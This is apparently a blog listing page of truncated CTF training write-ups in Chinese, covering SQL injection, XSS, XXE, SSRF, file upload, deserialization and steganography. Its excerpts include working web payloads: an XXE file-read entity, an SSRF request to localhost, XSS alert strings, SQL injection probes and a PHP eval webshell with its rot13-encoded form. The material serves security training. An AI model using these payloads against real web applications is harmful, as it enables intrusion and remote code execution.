- 博客(15)
- 资源 (1)
- 收藏
- 关注

原创 小工具使用集合
1.dirsearch作用:目录扫描工具地址:https://github.com/maurosoria/dirsearch命令:python dirsearch.py -u www.xxx.com -e php2.GitHack作用:GitHack是一个.git泄露利用测试脚本,通过泄露的文件,还原重建工程源代码。地址:https://github.com/lijiejie/GitHack命令:python GitHack.py http://XXXXXXXXXXX/.git/...
2020-07-27 17:29:18
1465
原创 8月8日Misc隐写训练
题记第一题题目:思路:隐写的题,尤其是图片的题,我的思路一般就是先看题目提示,如果有提示就顺着提示走,没有提示就是以下流程,1、右键notpad++查看hex代码,简易分析是否存在文件头补充、IHDR、明显的flag、较为不同的其他格式等2、kali中使用binwalk与foremost进行图片查看分离3、steg打开查看色道,或者lsb4、步骤一两张一摸一样的图片,先确定考察知识点应该是1、steg的异或;2、binwalk的不同查询后没有任何明显的flag信息。步骤二将图片放
2020-08-09 15:20:31
667
原创 8月7日CTF反序列化训练
题目一题目:思路:根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可步骤一源码分析:class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
2020-08-08 13:58:08
1678
原创 8月6日CTF命令执行训练
题记:抽空写第一题题目:<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+|\_|\^/",$c
2020-08-06 16:40:00
1786
原创 8月5日xxe漏洞训练
题记:复制粘贴的一天今天的重点是xxe漏洞,本地环境需要搭建服务器,可搭建云服务器,做题的重点反而是伪协议各种常用语句的使用<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag.php">]><note> <info>&xxe;</info></note>//file协议获取
2020-08-05 17:32:12
501
原创 8月4日题目解析
第一题题目:<!DOCTYPE html><html><head> <title></title></head><body><!--error_reporting(0);$flag='flag';if ($_GET['name1'] === $_GET['password1'] || MD5($_GET['name1']) != MD5($_GET['password1'])) { d
2020-08-04 19:14:22
793
原创 8月3日ssrf漏洞解析训练
第一题题目:思路:点击logo获取如下界面分析:本题链接暴漏两个问题,一是flag.php在根目录下(原因前面的index.php就在根目录下,一般的话两者在同一目录下);二是img参数(因此需要构造对应的img链接,然后形成破损图片并保存)步骤一:构造payload:http://39.71.44.204:21029/index.php?img=Http://127.0.0.1/flag.php找到图片源新建窗口打开地址:http://39.71.44.204:21029
2020-08-03 18:06:33
850
原创 8月2日xss漏洞分析训练
题记:今天老师也出了三道题,但是对于XSS而言题目数量少,较难组织成规律,因此找了这个在线网址可实现在线做题。思路:做题以前先理顺一下思路,首先传统语句测试//script脚本风格<script>alert(1)</script><script>window.data = alert(1)</script>(意义不大)//img标签<img src="" onerror=alert(1);>//href链接<a hre
2020-08-02 18:29:00
2134
1
原创 8月1日CTF文件上传训练
题记:满足于只做出一道题的今天一、伪协议上传题目:思路:代码表示需要使用伪协议上传,且不能用base64dir=php://filter/write=string.rot13/resource=file.php制作rot13cmd.php内容:<?cuc @riny($_CBFG['pzq']);?>//<?php @eval($_POST['cmd']);?>的rot13编码在dir处写payload:php://filter/write=string.
2020-08-01 19:17:42
1202
原创 7月31日CTF文件漏洞训练
题记今天主要是文件上传及下载,高难度第三题一、文件包含题目:思路:文件包含,右键源代码,利用data、filte等伪协议传参步骤一:发现注入点右键源代码发现php链接新页面点击后快速结束,需要抓包步骤二:伪协议分析上述代码发现传参file,同时屏蔽了tp、input、data等协议。同时增加了一个flag.php(直接打开可不行)本页面上编辑伪协议file=php://filter/read=convert.base64-encode/resource=flag.php bas
2020-07-31 17:01:34
1389
原创 7月30日CTFsql注入训练
题记:这几天最崩溃的,鼓捣了两个小时,从正确答案到绕过所有终止符,从托库出数据表数据字段到non-numeric,闹混了头。以此为戒切勿钻牛角尖。一、报错注入题目:思路:很明显,本题是报错注入,注意被绕过的关键词就可以步骤一:试探首先是随意提交个用户名和密码,发现是get传参,尝试测试几个关键词,如‘ “ 空格 = + - )等,以及select、union、or、information等没有屏蔽且符合报错注入判断标准的如上图被屏蔽的关键词如上图因此可以测试出来,本题为单引号注入,且空格
2020-07-30 23:14:00
1071
原创 7月29日CTFsql注入训练
一、g00d_sql题目:思路:这个题其实就是weblib闯关的一道题两个输入框分别是用户名和密码,主要考注入步骤一:试探先用户名输入1,密码1,试一试发现报错后,试一试万能密码 1’ or 1=1#明显可以采用注入的方式步骤二:手工注入按照以下步骤开工:1)判断是否存在注入点;2)判断字段长度;3)判断字段回显位置;4)判断数据库信息;5)查找数据库名;6)查找数据库表;7)查找数据库表中所有字段以及字段值;payload:-1’ union select 1,gr
2020-07-29 14:02:34
1003
原创 CTF7月29日笔记---sql注入漏洞
sql基本属性sql漏洞注入的本质攻击者利用WEB应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令。sql注入类型1.数字型原理:当输入的参数为整型时,如ID、年龄、页码等,如果存在注入漏洞,则可以认为是数字型注入。测试步骤:http://www.example.com/test.php?id=8' 返回异常http://www.example.com/test.php?id=8 and 1=1 返回正常
2020-07-29 12:20:34
1300
原创 7月28日ctfweb源码泄露及代码审计训练题
1.试试手题目:// 题目是php界面信息 <?phphighlight_file(__FILE__);include 'flag.php';if (isset($_GET['p1'])){ if ($_GET['p1'] > 99999999 && strlen($_GET['p1']) < 9){ echo "111"; if (isset ( $_GET ['p2'] )) { $
2020-07-28 13:38:02
2971
原创 小白的25天CTF征程
小白的25天CTF征程ctf因为业务比武的原因需要利用两个月的时间将自己从小白培养成稍微黑一点的小白,时间比较紧张,过去的编程几乎毫无基础,因此只能通过做题来提高自己水平,就当是简单的做题wp吧。Day 1攻防世界真不错,先从进阶区的第20题开始吧,争取尽快刷一遍,然后再去挑战一下buuctfTitle1: 2017_Dating_in_Singapore题目:附件:以上就是本题的涉及内容,首先我们先看到题目描述:01081522291516170310172431-0506071320272
2020-07-27 11:04:01
2766
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人